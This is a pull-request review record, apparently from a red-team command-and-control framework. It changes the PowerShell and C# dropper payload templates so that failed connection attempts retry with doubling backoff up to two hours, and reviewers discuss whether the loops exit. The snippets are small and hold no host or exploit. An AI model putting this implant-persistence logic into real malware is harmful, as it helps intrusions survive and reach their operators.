### PR TITLE
 Make payload retries and initial wait configurable and double timeout every failure

### PR DESCRIPTION
**Pull request by riskydissonance**

### CODE REVIEW

File: resources/payload-templates/dropper.ps1 [hunk 1]
```diff
@@ -87,8 +87,15 @@ function primers {
...
-Start-Sleep 600
-primers
+$wait = 30
+while(true){
+    primers
+    Start-Sleep $wait
+    if($wait < 7200){
+        $wait = $wait * 2;
+        if($wait > 7200)
+        {
```
Comment (benpturner) [inline resources/payload-templates/dropper.ps1]: Does this ever come out of the while loop?

File: resources/payload-templates/dropper.cs [hunk 2]
```diff
@@ -30,24 +30,37 @@ public class Program
...
+				primer();
+				break;
+			} catch {
+				mre.WaitOne(waitTime);
+				if(waitTime < 7200000){ // If connect fails retry but keep doubling timeout up to two hours.
+					waitTime = waitTime * 2;
+					if(waitTime > 7200000)
+					{
+						waitTime = 7200000;
+					}
```
Comment (benpturner) [inline resources/payload-templates/dropper.cs]: Same here, does this ever come out of the while loop and finish execution properly

**Review by benpturner — APPROVED** [review]

File: resources/payload-templates/dropper.ps1 (hunk 1 above)
Comment (riskydissonance) [reply resources/payload-templates/dropper.ps1]: I think these comments are on outdated code but no it doesn't come out of the while loop as `primers` doesn't ever return once it is successful, so there's no need

File: resources/payload-templates/dropper.cs (hunk 2 above)
Comment (riskydissonance) [reply resources/payload-templates/dropper.cs]: In the up-to-date code it does aye there's a `break` on success

**Pull request merged**